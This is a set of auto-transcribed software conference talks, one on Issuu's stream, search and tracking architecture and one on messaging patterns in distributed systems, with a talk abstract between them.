supervised processes to handle failures gracefully and time out and all that kind of thing. And Erlang has proven for us to be a really flexible and scalable platform to handle this. So it is my firm belief that if you have never programmed anything in a functional programming language, then sitting down and learning to program something in a functional programming language will make you a better programmer. So it's actually sometimes difficult to get to hire new developers that know how to do functional programming. But I think they are better developers for it and it's actually a good thing for us. I think that it's difficult sometimes because I think the people that we finally do get are better for having spent time on learning this kind of stuff. Okay. I want to show you another stream. Let me see if I can make this work. No, that's death by PowerPoint but not yet. I'll tab over there. I'll try. Okay. So if you go, where is my mouse? If you go to issue.com here. And you are a, I'm now logged in here. And if I go, if I'm not, that's excellent. Okay. So when I go to issue and I'm not logged in, this is what the page that I would see. We have some banners up here for stuff that we are promoting. But basically we have a stream down here of document covers. This has content from various sources. Basically the point here is that we want, our whole goal is to create a stream of content which may or may not be relevant or interesting to you as a user. But it's our job to try to make, to serve up content for you that's as interesting as we can possibly make it. So I can scroll down here. It's a long stream. And you can see the spinner that spins. And then we can go fetch some more content. So basically from my perspective, this is an infinite stream. And we separate the fetching of content into the first fetch of a batch of covers, which we call the initial request. And then we have subsequent request, which we call continuations. And I'm going to talk more about that in just a second. So, right. So we present streams of interesting documents. And then I want to talk a bit about what interesting is. Well, if we don't know anything about a user, if it's a new user to issue, we've never seen him before, we can make some assumptions about what might be interesting for him or her. So, we know where you come from. We can look up your IP and your GUIP database. So we can maybe serve up some stuff that other people are reading near you. If you have already read stuff on issue, we set a cookie in your browser which tracks the latest whatever, 10 documents that you've read. Actually not documents, but segments that you've read. There's your segment. We'll see another use for it later. And we might choose, we have an editor that picks out documents which has been uploaded to issue that he finds interesting. So that might be something we can serve up here. We pick out certain categories. Again, this is certain segments that we've found might be art or travel or news or whatever. So we can also put content that comes from certain segments into the stream. If you're doing a search, it might also be relevancy. So if we go back to the Chrome here. Then these various covers, they come from different sources. They might be there because it's an editor's pick. It might be there because it's a document that's trending near you. It might be there because it's a news document or it's an art document or whatever. So what does this look like? And I wanted to show you, it's actually, it's a pretty complex description of a stream, right? And the client here, it's just one continuous stream of documents. But as we explained it, we have many different sources that go in and we're going to go out and query and then merge into a single stream. So on this next slide here, this shows all the sources that go into making this one stream. And it's not as bad as it looks. And we're not going to go into detail. I just wanted to show you some of the thinking that we've done to build this stream. And other streams that we have on the site are similarly complex. But basically, all these guys over here are different categories. This one here is learning, for example. This one's business, style and beauty, home and garden. And when we're trying to serve up a stream for you, we say for news, for example, that we want some of it to be boosted for locality, for geographic locality. News is maybe more relevant if it's local, your local news. But there might be some international news. So in news, we've split it up into something locally, which is locally boosted and something which is just globally. We have these purple guys here, our searches for documents that are in segments that you have previously read. And these are your three most read segments. So we can go out and try to find documents that live in the same segment, put those into the stream. We have the editor's picks. We have trending documents. So all the leaves in this tree, the root is up there in the corner, all the leaves represent content sources and these guys and merge content from content sources. And then we need to sometimes go out and decorate results from over here with extra mesodata so that we need to actually serve it up. And let's see. So this is just another view on a stream that I have cut out. You can see here that it's colored. So actually we have debug tools that will allow us to say, well, when we're looking at the stream and trying to find out, does it feel right? Does this stream have the right taste? Does it contain the right documents? Then you might want to ask, well, why did I see this document? Did I see this document in the stream? Because I read it recently. It was in the same segment. Is it trending? Is it an editor's pick? Then I can go into debug mode on the stream and then I'll get them color coded. And then this color code will correspond to this graph here. One final thing that we design into the system is that we can, for each content source, we can annotate it with properties such that we can automatically reason about the kind of content that we get. For example, it's important that we try to avoid serving up explicit content unless users have explicitly indicated that they would like to see explicit content. So we can then annotate this source over here and I say, I'm going to guarantee you that this source will never return an explicit document unless the user has requested us to do so. And then we can verify at tree construction time that we will in fact never return an explicit document. This has been quite useful for us, at least this is sort of a piece of mind thing that we know. Okay, we won't do this unless we really intend to. Okay. So we have actually learned that because of the large number of streams and the complexity of the streams that we have, that self-documentation of streams is important. And I can't click the link. I can click it here. Thank you, Keynote. Keynote is really being helpful here. So this is the self-documenting part of the component which revs up the streams. I can go to the server. We have a number of workers that serve this and this is going to tell me which worker is actually serving this request right now, what streams that it serve. They all have names. They all have version numbers. And they'll even, they can even draw themselves in a nice way so that me, just the version of the graph that I showed you was a handly outed. Did I manage to click on it? Yeah, here we go. So this is what the actual machine rendered version looks like. It's a bit wider. But this has proven, this self-documentation thing has proven to be very useful for us to try to find out what's going on in our system. Right. So how do we actually deliver these streams? Well, when we've reached and gone to this stream-based version of issue, it looked slightly different a few weeks ago if you'd gone on to issue. So we didn't really know when we were doing this redesign how many streams were we going to serve, what the load on each stream would be. And as we've just seen, one request to say the explore stream becomes many requests when we're fulfilling it on the server side. We need to go out and get all these categories. We need to get the editors picks and so on. We, one explore stream request gives rise to 27 internal requests within the issue side. So we needed to think carefully about how are we going to handle caching and then do load testing while we're developing, trying to emulate as realistic a user scenario as we possibly could before exposing this to the world. And we just, we came up with a number, we guessed and we said, okay, we're going to be able to handle more than 200 streams a second. And then what happened? Well, when we went live, this is the actual number of streams served over the last, well, few days from May 30th to the 7th of June. That's a few days ago that I took this picture. But basically, the yellow graph here shows the number of initial requests served and the green one shows the congenerational requests. So if you sum these up together, you'll see how many requests we've served in all. Looks like peak around 4,000 requests a second. Here we didn't serve any. That's probably because we crashed. And then we can see that we have a distribution of load throughout the day. So from a valley to a valley or peak to a peak represents a 24 hour period. It also shows that, well, at least by experience, we know that in the afternoon, the topmost peak, let's be one, the Americans are up and awake in reading stuff. That's a large part of the traffic. And this is in Europe. We get this peak here at lunchtime around Europe, a little valley before the Americans wake up and start accounting for more traffic than the Europeans do. So the actual usage pattern is only 4,000. These units are requests per minute. So if you do the math, you can end up at about slightly under 70 peak per second. So since we designed for 200, we were safe there. A pattern which was really useful for us here is that we use a product called carbon for monitoring for doing all these kinds of statistics performance measurements. We have lots and lots of things that we can measure. Cash performance, request per second, response times, a whole plethora of things. And I just want to show you that we can actually, this can give you lots and lots of stats. And what this really gives you is once you have a history of past behavior, you can go in and query in carbon. Might not even be, you don't have to define it up front. It just stores all kinds of statistics and you can see it on different scales. It has around Robin database where it first stores per minute, then per chunk of time, and then per larger chunk of time. So you can go back and query historical data. What do you call it? Carbon. Carbon. C-A-R-B-O-N. It's a graphing tracking. Is it like MRTG? I don't know that. It's very much like that. It's just like a thing on top of it or inspired by the same pattern. So we use two tracking infrastructures for statistics gathering like this. One is called cacti and the other is called carbon. Carbon is the more flexible of the two. And this is, I don't want to talk too much about this. I just want to show you that we have lots and lots of stats that we can gather and we can put them all together in a nice picture and carbon will serve them up. And we can actually see here, this is the response time for the explore streams. And this was, this is real time right now. So something happened at around midnight. And I talked to the guys back in the office. We don't really know what it was. We're digging into it. But the response time for the explore stream shouldn't be four seconds, which we would much rather sit down here around five hundred milliseconds to serve up the explore stream. We don't want our users waiting for that long. But if we wanted to look into it, then we have this tool to dig into various performance metrics. And that's been really, really useful for us, essential I would say. So what does a stream server look like? Well, up at the top, we get in, the client will connect to, we go through the API server actually. So always lying, lying a little bit before when I said that we go to access the stream server, we should actually go through the API server again. Comes in as an HTTP request. But here we use a messaging infrastructure, which is called AMQP. Also an immensely useful tool. AMQP is, can serve out messages in various ways. Here we use a work queue model, where we have a work queue that we have stream server processes running on many hosts and many available, or two availability zones, such that when I issue a request as a user, it goes on to the message bus and the first available worker, which can pick up the request and try to fulfill it. And the worker will then fulfill the request for the explore stream, say, by going out to MySQL maybe to get metadata about documents or to a trending server to find out what's trending near you. It will go to Solar, and I'll talk to you more about that to find content within a certain category, say. And then some internal APIs we expose as RPC calls again over AMQP. It's the same AMQP server. So we might go directly to the API server, which will then do stuff with its back end servers. GeoIP lookups, we will do over here. We have also an ad serving or promoted document serving. It's possible on issues to pay, issues to raise up the documents ranking, basically. So AMQP here works as our load balancing mechanism that works really well for us, the work queue model. If we find that the stream servers are not responsive enough, if we have no available workers, it's very, very easy for us just to fire up another instance, another worker, another host with more workers on it, and that will scale very rapidly. In a matter of minutes, we can increase our processing capability horizontally. Also another pattern that we use here is that since when I connect the first time to say, please give me the first documents in the stream, I will get a response back. And the next time I send, well, please give me the next documents in my stream, then I have no guarantee that I'll be connected back to the same workers. We designed the workers to be stateless so that the response you get back from a worker also contains, now we have all these substreams, and then contains sort of a representation of the offset in which are the substreams that I'm in. And then another worker can pick up the continuation request, which has the necessary data to say, well, I'm here, then you can give me, say, 50 more documents. So this stateless worker shared nothing model has been very useful. And the final thing is that to allow workers to share some state or result of some processing so that we don't unnecessarily have to go out and hit all these back-end systems, we try to cache as much as we reasonably can, and we do that by using Redis locally on the machines. Redis is an in-memory key value store, which works very well for this kind of pattern. And finally, I don't know if I mentioned it, the stream servers are simply Python processes, so it's just Python glue to orchestrate all of this. Yeah? Do you have some kind of sticky, especially thing that you think of? No. Every day, one of the Redis servers, they share them through stream servers. No. So actually, if I do one request and I end up on one host and then I do another request and I end up on another host, if that is not cached, whatever is necessary on that host, then I might have to do the work twice or up to four times since I have four servers. So that's just... No, but then I might look at, Redis has a replication capability, so I might use Redis' replication capability to avoid this kind of thing. I might set up a completely external pool of memory caches. There are several ways of working on this. That would also... But sticky session... So it's slightly sticky, so that you prefer this one, right? Yes. But that might give other issues with respect to load balancing and sticky sessions is an HTTP concept and since we're transforming HTTP requests into messages on a message bus, it doesn't really fit into a stickiness architecture. So there are probably several ways of handling this, but it hasn't proven to be necessary yet. Another thing... I only have 10 minutes left, so I'm going to speed up a bit. Another thing which this model gives us is automatic failover. There are no available workers to handle your request in a short time, say 400 milliseconds. Then NQP supports a concept which is called dead lettering. Dead lettering basically means that if I've been waiting in line and I can't be served quickly enough, then the NQP infrastructure will automatically move my message over to another queue where we have another pool of workers sitting waiting and they will be able to give you a response which isn't as good as the response over here, but it's sort of a canned response which is better than nothing. So then I can give a guarantee about within a relatively short period of time, I will be able to give my consumers a response which will either be good if all this over here is happy or it'll be slightly less good but at least won't be an error. Right. I will talk a bit about search now. So part of the fulfilling the category part of the stream and also the stuff which is related to documents that I read recently by looking at the segments is handled by a search engine. And actually it turned out that we had several kinds of searches that we wanted to do. In some cases we only search on document metadata such as the document segment, the language that it's written in maybe by publisher, a whole range of field that we might be able to think of that we are sort of the only metadata related to the document. Sometimes you want to search the full text to find out if I search for fashion would that be relevant within the document. Maybe I want to search within a document or I can search publishers and we also have a concept called stacks which is a way for which allows an individual user to collect documents into groups which are meaningful for that user. We have in our search indexes we have around 9 million documents because not all of the documents that are on issue are available for public consumption we call these. The ones which don't go into search are unlisted so you can't find them in the search engine. We have around 250 million pages indexed, one million publishers and around 700,000 stacks right now. We ended up using solar. It's an open source search engine and infrastructure surrounding search. A good pattern for us was to fit stuff in memory that could be in memory. So the metadata index we only have 12 million documents that will actually fit comfortably in memory on a large memory machine. Text search that index is pretty large so to do that we needed many searches. It's a disk intensive operation to traverse an index so we use SSDs, back disks to get maximum performance out of that. Solar is actually very fast infrastructure, it's very good at indexing, it has some pretty impressive numbers. So basically the Mesa data index we can re-index in a matter of hours, the document index we can re-index in say 8 hours and per page index which is the biggest one, takes slightly over a day. We're using solar 4042 and we're trying to keep up there, lots of releases of solar. So the interesting part with solar, again we see the same multi-availability zone thing that we've seen throughout. A proxy in front, solar has an HTTP interface so the stream service will connect to solar through HTTP. We can put these in several zones, we have these various indexes running on different hosts. So that part is fairly run of the mill. What's more interesting is how we actually keep the solar indexes updated and that's real work in my mind with how to use solar is how do you actually feed the content into solar, how do you mesh it into your infrastructure and pick up relevant bits whenever necessary, when a document is uploaded, when a document is deleted, when a user decides to change stuff. And that is done simply by having a generator process which sits and listens on MQP and we have documents which manipulate, processes which manipulate documents on issue when these events happen, we'll put messages onto the message infrastructure saying, ooh, a document was uploaded or a document submitted as it was changed, this generator can then listen to the stuff changed events, go out and query all the relevant external sources, gather together the content about this document and then put it as a message onto this bus and these guys up here that are interested in that can then subscribe to messages down here and say, oh, now I need to update myself, update the solar index with this relevant content and these update are all written in Python as well. There's no real need for any high efficiency here, it's more a matter of basically processing JSON messages and sticking them into the index, yes? So, every once in a while we can see that the solar index gets out of sync with the authoritative storage, whatever it is and then we can re-index and we designed for automatic re-index, basically it goes to push of a button and we can spawn off a new instance with an authoritatively correct index and an advantage of using the message infrastructure is that you, if you have a queue of stuff that, say, this instance here is responsible for getting into the index, if this guy crashes, when he comes back up, he will have queued up messages of stuff that he has to do, documents that have been deleted or documents that have been added whenever, since he went down. So, when he comes back up, he will read off all the messages of stuff that has to be done and he will get in sync. So it's a fairly robust architecture for that. You said that you have an authoritative index, do you actually just cook it out in the files that are for you? No, no, so when I say the authoritative index, it has many different sources. So my sequel, for example, is the authoritative storage place for anything to do with documents and users. We also use popularity measures which come from other parts of the system for ranking within the searches. So they are authoritative for that. Whenever we just, we have to query many different sources for what is authoritative for this view on this document. How do you prepare for horizontal scaling with solar? So solar for series comes with a concept called solar cloud, which basically is a pool of service and it does all kinds of sharding. It uses an Apache project called ZooKeeper to handle distribution of, it's masterless, so it has many, many clients and sharding and validator. And what we learned was that this doesn't work. It's simply not mature enough. So we basically just do simple servers and the message bus infrastructure just handles the load balancing for us. We have, once from an individual service view, it's just a single solar index with just a single solar server. It knows nothing about any of the other servers. And all the load balancing and distribution of work is all handled through the message bus infrastructure. Okay, I only have three more minutes, so I want to get on to talking about how we handle consumption tracking. Whenever you are moving around on issue, we collect all kinds of stats about you because that's important for us to know how you as a user act. And basically we are generating what we call pingbacks. And then capture the message sent from the client back to a server at issue, which contains events that you've performed. Like I have read a document, I have seen this document displayed and impression of a document, I have flipped the page, I have spent an increment of time on the page so we can track how much time is spent on given pages and documents. And the model that we've used to handle this is, there's quite a lot of traffic here on average 10,000 events per second. Because the client generates a pingback, which is an encapsulation of one or more events. Again, it goes to a proxy, which can distribute out to one or more loggers. And loggers are basically just Python processes which will build up chunks which contain sets of pingbacks. Now, a pingback is just a JSON structure. So a chunk is a new line separated batch of JSON structures. These are all stored in S3 that allows us to sort of separate out on a large number of workers an aggregation into larger units. And that stores comfortably in S3, scales pretty well. And then we then have, we like to be able to express that we have now authoritatively received the chunk. We want to give it a unique serial number so that we know how many chunks we've had. And we also want to time stamp it so that we can agree on what time we've received all the messages in there. And then that's a process, a single point of failure, a single process that will lift chunks out of there, move it into here, give it a monotonically increasing serial number. And then once it's moved over here to the sort of the authoritative storage, it'll send out a message on NKP saying, now I have a new chunk available. And then we have aggregated processes which can lift out chunks and collect various stats, say how many reads and do something about it. And it'll store it in a, in a queryable data store of various kinds depending on what kind of stats we need. This has proven to be a very flexible model. It scales very well, but it does have some problems, which is that once we have received the data, it's not immediately queryable. And we would like to have, to implement some way which would be more immediately queryable, more directly queryable. So we're looking at refining the way that we've done this into something a bit more lightweight. Right, so. We are actually experimenting with Hadoop to, to processes. We're trying to set up a Hadoop cluster to see how much throughput can we get with Hadoop to, to processes. But even writing stuff in Hadoop or pig is not really ad hoc. At least not, not enough for, for the data business analysts guys that want to do it. So. Have you looked at stats, the Etsy stuff? No. But I'd like to hear about that if you just give me a pointer afterwards. I'll just try to wrap up here now. So when you do stuff at web scale and you pick up the tools from the web that are supposed to be able to handle all this kind of stuff, it often doesn't work, at least in our experience. And you really have to know what you're doing with it. It doesn't, there's no, no silver bullet. There's no magic. You really have to understand what you're doing in order to make it, make it scale at high volumes. We've experimented, for example, with Elasticsearch and with Couch2B. Didn't work for us to be fair. Elasticsearch was, this was one and a half years ago when we tried it. It was still very immature. It might be much better now. We're gonna...
|
Issuu provides a distribution platform for print publications and viewers for a range of devices. Much like on YouTube, users can upload content and share links to a viewer that displays the content. Issuu has more than 11,500,000 publications, serves over four billion pages a month to 70 million unique monthly visitors, making Issuu one of the 600 most visited sites in the world. On average, 25000 new publications are added daily, and they are automatically categorized and fully searchable. The 7 million registered users can upload publications and create collections of their favorite publications found on Issuu and share them with other users. This talk will provide a high-level overview of the Issuu architecture by tracing the lifecycle of a publication. How does the upload process work, how does automatic categorization work, how does a publication become searchable, what happens in publication discovery and consumption, etc. Keywords: Scalable architectures, functional programming, statistical analyses, programming in the large, cloud computing, Amazon EC2, message bus (amqp/rabbitmq).
|
10.5446/51440 (DOI)
|
All right, thank you everyone for coming. My name is Jimmy Bogarts. Today we're going to be talking about, well if you couldn't guess from the title, we're going to be talking about messaging and distributed systems. It's a little bit of a play on words because a lot of what I'm going to be talking about today is looking at how the constraints and problems of the real world and how people solve them in the real world can be applied to systems that we build. You can find me at Twitter at atjbogart and I also blog on that link below there. Everything that we talk about today will be on my GitHub which is also just github.com slash jbogart. Try to keep it simple because I can't remember too many things at once so try to just keep it one at a time. This talk actually has no code in it whatsoever. If you want to see some code, now's your chance to go somewhere else because we're not going to be actually seeing any code today. The reason why is that a lot of the systems that I see worked on, especially distributed systems, people like to dive into the code and the technology really quickly. With something like distributed systems, it's really, really important to think about how these pieces are put together before we start talking about any sort of code. That's one of the reasons why I didn't want to show any code is because I really want to talk about what are the different patterns that we put in place to be able to build distributed systems without showing the code. The other reason is I didn't really want to show a specific technology because all the patterns we're looking at can be applied to any messaging technology, whether it's human messaging of telephones and postcards and email and things like that, or actual technology we probably work on things like MSMQ, Azure service bus, RabbitMQ, ZeroMQ, those messaging technologies, the patterns we can apply apply to all of those, not just any individual one. Like I said, I meet with a lot of teams that build distributed systems. The reason why I'm usually meeting with them is they either don't know what they're doing and they're not having built anything yet, or they built something and it was a complete disaster. I wanted to share a couple of stories of some of those disasters just to highlight why they were thinking the wrong sort of things when they're building their system and if they thought about things in terms of how it would work in the physical world, they could have built a much better system. One team I consulted for is a Fortune 50 e-commerce company. They have 75% of the business through their website, billions of dollars a year. They wanted to upgrade their websites and not just their website, but all their back and systems as well. Just like a lot of systems that you probably worked on, they start small and they grow over time and it usually just becomes this one big ball of mud that all of the systems work against a single application. This company in particular started in the 80s, so it was built on mainframe and the mainframe was built up as high as it could go and wouldn't go any further. They said, okay, obviously the mainframe isn't going to scale any more than it is now. We've got all these different other things going on, the websites and mess, everything's in the code behind. What we need is service oriented architecture. So said the consultant that was there six months earlier. They wanted to SOA because they were told that by breaking these things up in individual pieces, then they can have easier to work on, easier to deploy, be able to reason about it, less bugs. Hopefully, that was the grain vision. They, in applying SOA, they also thought that meant that you had to do SOAP everywhere. So that SOAP was just the logical extension of SOA. To do SOA, you have to do web services and you have to do SOAP-based messaging. So they took this application, broke it up on all these pieces and used WCF calls to be able to connect all the pieces. So if I wanted to go look at a product page, I would go to the list of products. Well, if I wanted to get a price on something, they would have to make a call to a price service to go get the price because price is something over here that's being done. To show the content, I have to go to the content service to know if I'm in a different region, different language, they'd have to call to these other services. So everything was broken up really well, but everything was using WCF as the communication mechanism between these different things. So they, you know, they called themselves Agile, they didn't actually deploy anything for about a year and a half, so they spent, and this is not an exaggeration, they spent over $100 million on the system before they even tried to go live. So once everyone was done, because they couldn't just roll it out one piece at a time, everyone was done, they said, okay, let's go to our test environment to see if, you know, how this thing works. It didn't come up, the page timed out, nothing came up. So, okay, well, you know, production will be in production hardware, so let's go to production-like hardware to see how this might run. So they go to the production-like hardware and it's still timed out. So they said, okay, huh. So let's jack up all the timeouts on all of the WCF endpoints as high as they'll go, which is an ungodly amount, it's like five minutes, you can make it 30 minutes if you want to, and see how, if we could just get this page to respond. So a single page, just showing a list of products for a single category, nine and a half minutes to render. Nine and a half minutes. Now, the funny thing is that they actually had a working application in production, so if you look to the production application, the response time was something like three, four seconds. Not insanely fast as fast as Amazon can get sometimes, but still, I mean, like, they went from three to four seconds to nine minutes for the low-low price of over $100 million. Just absolutely insane, but when we talked to them, we looked at, you know, okay, good that you wanted to break things out into services, but the way you decided to integrate them would not work in the real world. And so one of the things we'll be looking at over the course of today's talk is looking at those decisions, just when we have different processes and how they communicate, have a real effect on how these systems can communicate. And the same constraints we find in the real world will also apply to the systems we build. And all the constraints about their system, they said, oh, yeah, of course, a product catalog can call us the price service. Well, that's 100 milliseconds. You know, we've fulfilled our SLA. But then they have a list of products, so they were calling it for each one. So just to see, like, the sort of network graph, by the way, trying to get a stack trace of that is impossible when you have, you know, 18,000 servers running this thing and try to figure out what the, you know, how a request actually goes through. Just, you know, there's a circle of hell for people that had to figure that out that's just absolutely amazing. So one of the things that we talked to them about, and this is sort of a disclaimer here, is nothing that you, nothing that we see here, oops, there we go, PowerPoint 2013, no idea, nothing you see here will be new to you. All the patterns we talk about, you've already seen in real life. What you probably haven't done is taken those ideas and applied them to the systems you're building. Because as soon as we go from a single in-process, one, you know, one-process system to one that has more than one process, we have to think about how those things interact. So what we'll be going over today is looking at, in the real world, how people actually scale up real world systems that don't involve computers, and how those same solutions can solve our problems and messaging between our systems. Now just to take one step back, when I talk about messaging, I'm necessarily talking about MSMQ or RabinMQ. I'm more talking about just the general turn of when things needed to exchange information, because a message is just data, and messaging just involves the transfer of data from one entity to another, that's really all messaging is about. So everything we see here can apply and will apply to things like REST, to things like RabinMQ, to both durable and non-durable messaging, all sorts of styles of messaging that we'll be talking about, all of which have a place in the systems that we built. So let's look at different styles of messaging before we see how we can apply them. So there's a few different flavors of the kinds of messaging that we'll be looking at. First starting out, we'll look at synchronous versus asynchronous messaging. Synchronous messaging is when the first person makes a call, sends a message to the second person, and they block. So I don't do anything else until I receive a reply, and the other side can't do anything else until they've responded back to me. So typically I think of this in real world terms as things like phone calls. When you call someone on the phone, you can't do anything else. I hope you're not driving while it's all, well, I don't know if they passed laws here, but they started passing laws on the stage, you can't talk and drive. They've done a text and drive, that's just amazing to me that people can actually do that. I guess they can't. But I think of it as synchronous messaging as a phone call, because I have two independent people that are doing their own thing, these could be two processes, and in order to make a synchronous call, they'll block on both sides. Now WCF lets you do things like async. You can decorate your controller action with async and await, and it won't block on the server side for another request to come through, but I'm still blocking on the client side. So if I make a request, I'm waiting for a response, and I'm not doing anything else until I receive that reply back. The other side would be the async messaging. So in an asynchronous manner, whenever I send a message out, I'm not waiting for the other side to confirm that they've received and processed the message. Now I may synchronously wait for my messaging system to confirm they've received the message. I imagine this as basically sending a letter. Whenever I go send a letter out, I'm synchronously walking to my mailbox and dropping the letter in, I don't know if people still actually do that these days, but it has helped to be able to remember these systems at least. So that is a synchronous operation. I don't fold a paper airplane and just throw it over there, and maybe it makes it into the mailbox, maybe it doesn't, but I do block until I actually put the message in the outbox, and then I'm done. But I'm not blocked and waiting for the other person to read my letter. When they read the letter, I have no idea. I don't care. So we use this every day, of course, in email. We send emails out, and we're not waiting for a reply back at that time. If we wanted to have a synchronous communication, we should have just called them up on the phone or just go physically talk to them face to face. So things like email and postcards are all about an asynchronous means of communication, and that's neither the sender or the receiver is blocking while the message is traveling back and forth. The next flavor we have are looking at durable and non-durable messages. So durable messages are messages that are stored somewhere. So they're not just something that is transmitted during the messaging and then goes away. They live somewhere. So I tend to think of durable messaging as things like email and postcards. They're physical items that if something goes wrong, I still have that physical item to go back to. If it gets misdelivered, I can still go deliver it back to the right person. These non-durable messages, like it says, is the opposite in which there is no sort of backing store for these things. They're just transmitted, and in the act of transmission, they live for that amount of time, and after they've received, they don't live anymore. So this is, for us in the real world, this would be like verbal communication. As soon as my words leave my lips, if you didn't hear it, you don't get the message. What's that? Oh, that's true. You can watch it in the video. Yes, of course. It's going to be that guy, all right? So putting these two together, we can have durable synchronous messaging and durable asynchronous messaging. We can have non-durable synchronous and non-durable asynchronous. So to me, the analog of a phone call is the same thing as something like a REST call or a WCF call. Both sides are blocking, and it's non-durable if you just use the default WCF, whatever. This is the same way HTTP is stateless by nature. So if the other side is down, then I don't get a response back. That's the synchronous part. It doesn't live anywhere either, so that's why people invent things like session state, because ultimately, requests are non-durable, and if I want to keep something around for longer than that request, I have to do something extra. So the first thing I have is, as I'm building systems that are using those technologies, I imagine my process is communicating to each other with those means. So even when I'm drawing, I'm like, okay, so this original e-commerce system, the system they built was one in which the user first came to the website, and that's a synchronous operation, right? I'm sitting at my computer waiting for the screen to come up to do something. So that's equivalent for me to come up and calling the person on the phone. I want to order something. Okay, so that person, the web server, received the request, and now they made 10,000 other calls to other people to then get the results of that request. So they call this person on the phone, they call that person on the phone, this person over here calls this other person. This is the picture I painted to them about the architecture they chose. I said, okay, these all have a response time, yes, of 100 milliseconds, but you add all these together, and you got a system that can't do anything. And it wasn't, even if they said, well, we'll just optimize, we'll just say latency goes down to one millisecond. And that's not really the point. The point is that I'm blocking all those requests because I have to make those calls to all those different people. And just slapping Async, which by the way, they did try that as well. They tried just slapping Async and all their web services, which basically made them have an internal distributed denial service attack because they would not block and wait for this one, they would call to this one, now one would not block and wait for a call to that one, and so they would just have these dead blocks with web services because everything was trying to talk to each other. Funny if we're not for the $100 million they spent on this system. Okay, so I've got durable, non-durable, and asynchronous synchronous. And the picture on the head is telephones and postcards. That's the means of communication here. Okay, so looking at, now that I have a basic means to have these messages, I want to look at a few patterns that we can apply on top of these messages. Because our transport technology doesn't really care what the message is about. We have to put patterns on top of the messages to have meaningful interactions between things. So let's look at a few patterns here. So the first one I have is one way and request reply. One way message is one in which I don't expect a response back. Now again, these can be applied to any of the other flavors of kinds of messaging, whether it's durable, non-durable, synchronous, asynchronous. So as we're looking at these, we can mix and match these different patterns together. One way means I don't expect a response back. And we see this every day. Someone sends us an email to whatever, or my wife tells me I need to mode along. These are one way messages in which they're not expecting any sort of reply. It could be durable in that I send an email to someone to ask them to do something, or it could be non-durable in that someone just tells me to do something. Request reply is a little bit different in that there's a request to do something and an expected response back. And those two things are correlated together. The reply doesn't exist without that original request. Just like in your email, you can't hit reply unless you're actually looking at an email. In our messaging systems, replies are always then forwarded back to whoever originally sent me the first message. Request reply is nice in that the person handling the message doesn't need to know about the originator beforehand. That is, if you published out your Twitter handle, I don't have to know about all of you before you can tweet at me. Once you tweet at me, I can see who you are, and then I can just reply back. But I don't have to have some giant phone book directory that knows every single person before we can have a communication. I just give you my initial address to contact me, and then we can initiate this request response interaction. A little bit more advanced one is in PubSub. In the published subscribe model, instead of me having just one person I'm replying back to effectively, I can broadcast out to a number of people that might be interested in this message. So we do this all the time. I subscribe to people's tweets. And so when you tweet out, I get that tweet. I don't know anyone else in the room, but you would all get the tweets equally there. So this is something, of course, that the real world has had for a very long time. Magazine subscriptions that have been around for a long time, it started out with Almanacs. This is just something that has been around for a very long time. And the mechanism is always the same, that someone that's interested in subscribing would first let this publisher know and let them know by saying, okay, and here's where I want you to deliver your message. So when you subscribe for a magazine or email newsletter, you have to tell them your email or mailing address in order for them to get back to you. And when the publisher then publishes a message, they just go through the list of all the subscribers and one by one, go ahead and send those things out. One of the things we have with PubSub is that each individual subscriber gets a different copy of the message. So this ensures that if someone's on vacation, it doesn't affect the delivery of magazines to anyone else. Or if one process is down, just that one process misses the message, but all the other processes are ignorant of that one going down. The other advantage to PubSub as well is that the publisher does not have to know about the subscribers beforehand. They are notified and told, okay, I want to subscribe and here's my address. But again, there doesn't need to be a global directory of everyone in the world before we can have this sort of published subscribe pattern here. All right, so next we have different types of interactions within those types of messages. So we have the basic building blocks are going to be one-way messages, two-way, which is request reply, and PubSub. With those three building blocks, we can start building actual systems. The next kind of messages we have are commands and events. So typically when people are looking at, well, when should something be one-way and when should something be PubSub? Typically what we'll see is that it basically drops into these two categories. Commands over here where she's making a rather inappropriate request to tell him to do something at the Christmas party. And events when something has happened, a notification out. So what I typically see is requests reply and one-way are typically commands, not always, but almost always. And events are typically PubSub, or that is when you're doing PubSub, you're typically broadcasting an event, because it's the publisher that has learned that something has happened, and so they're letting other people know. So it's typically something that's happened in the past and is an event. Any questions so far in the building blocks of messaging before we look at actually building a system on top of these? Again, this shouldn't be anything new. I mean, everyone's kind of seen this in real life. What we're going to see next though is how to take these building blocks, apply them to a real system to see how we can scale up based on the constraints that we'll find there. So messaging in real life. A lot of times when I'm talking with customers about how they want to build an architect or the distributed systems, I have them actually think about their systems in terms of what would this system look like if it was built 50 years ago? Because the same constraints we see today in our systems are the same constraints people have run into in regular applications or regular businesses from years ago. So things like restaurants. I have McDonald's there. Started out as one restaurant and scaled up to be thousands of restaurants nationwide. I've got the Sears catalog, where originally it started out as just one trading post store and grew to be a mail order catalog and now it's department store. The last one down there I have is a food truck. These are really popular in the United States as a hipster sort of food. They'll have clever names for these things and they'll drive around to different companies on different days and you can order food out of these things. Allegedly the health inspectors do inspect these things but I'm not so sure about that. So those things, the catalogs, the restaurants, those are all things that our businesses that drive commerce. So on the right side I have Amazon and Zappos and sells shoes. These are also things that have to do the same kinds of activities that a department store or restaurant have to do, which is provide a menu of items of which to select from, have some means of actually transacting business so they actually have to transact money and then it actually has to fulfill it on the back end. This is the exact same sort of things that the e-commerce systems have to do is exactly what's already been figured out in the real world. And this is where people start to go off. They don't look at their systems in terms of what their real world counterparts look like to understand how to solve those same sorts of problems because again the constraints of the systems we build in the distributed world are the same constraints we run into the real world. It's just the times they've gotten a lot shorter. So where's latency in the real world is in terms of seconds or days or weeks or months. In the virtual world they're much shorter but they're not zero. The latency is never going to be down to zero. Until we figure out the whole quantum mechanic stuff we're not going to have zero latency here. So let's look at a very basic application and this application is going to be our food truck. So I'm just going to have a picture of our food truck and we're going to try to do is scale this system up into one that can handle lots more customers and have lots more food trucks. And the same things we'll use to solve this problem we can also apply to the applications we build. So in this system this is a one man show. So I've got this one guy inside the food truck and he does everything. He takes your money, he decides what food he's going to sell. He might have, I didn't paint the thing. But he does all the steps. So he packages things up, he puts the ingredients on them, he'll grill them and he delivers them. He does all of those steps. So what this means is that with that one process doing everything it's very similar to this sort of picture. The traditional inter architecture is a single process where that one thread of execution that is that one request hits all these different layers doing all these different things and coming back with the result. Now of course the database is a different process and some of these things may also be different processes. But again it's a synchronous, I'm waiting for everything to be done before I come back and am able to actually help the user out. What I want to do is scale this up. And in my food truck I want to look at some basic properties here just to see where my bottlenecks and how can I scale this up. So I've got these four steps. I've got taking the order, I've got dressing which is only 10 psychots. Dressing does take a little bit of time because it actually has to cook and 100 seconds is pretty generous for grilling anything. It's just like little pieces of meat or something. I don't know. I'm probably packing and delivering 